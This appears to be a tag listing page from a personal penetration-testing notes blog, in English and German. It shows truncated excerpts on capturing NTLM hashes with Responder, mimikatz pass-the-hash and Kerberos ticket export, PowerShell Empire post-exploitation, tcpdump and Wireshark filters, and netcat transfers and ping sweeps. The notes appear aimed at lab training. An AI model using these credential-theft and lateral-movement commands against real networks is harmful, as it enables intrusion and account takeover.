5 Lateral Movemenent - akde/infosec

Responder

17. December 2020

responder: Listen with responder on a network and wait for AD systems to ask for a DC. This can reveal a NTLM hash. (Source) Start responder on the own system: sudo responder -I tun0 --wpad Connect from the target system to this system via smb. In the Windows explorer, or in the command line via dir…
Lateral movement

26. April 2020

Logon on another system with a NTLM hash Scenario: Then, use mimikatz to inject another user’s NTLM hash into the secret storage: Steal another user’s session Scenario: Then, with the use of mimikatz: privilege::debugsekurlsa::tickets /export This exports available tickets into the working directory (suffix .kirbi). Then, choose one file/ticket from the correct user and service. For…
PowerShell Empire

17. April 2020

Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
Sniffing network traffic (tcpdump)

20. August 2019

tcpdump Get incoming ICMP packets: sudo tcpdump -i any icmp and src host $target Nützliche Parameter Domains nicht auflösen, IPs anzeigen -n Dump der Daten anzeigen -X Paket in ASCII anzeigen -A Umgang mit Dateien Dump in Datei schreiben tcpdump -w file Dump aus Datei lesen tcpdump -r file Standard-Abfragen tcpdump -n src|dst 10.10.10.10 and port…
Wireshark

18. August 2019

See a packet in its context Kontextmenü, Follow auswählen Show only ICMP packets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside the own address ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wireshark can transform captured audio…
ncat

14. August 2019

Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…
Network and port scans

9. July 2017

General notes NC / Netcat Try netcat first on interesting ports or narrow port ranges to be more silent Network scan Choose a port which is probably open on systems on this network. E.g. 445 for Windows hosts or 22 for Linux hosts. for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…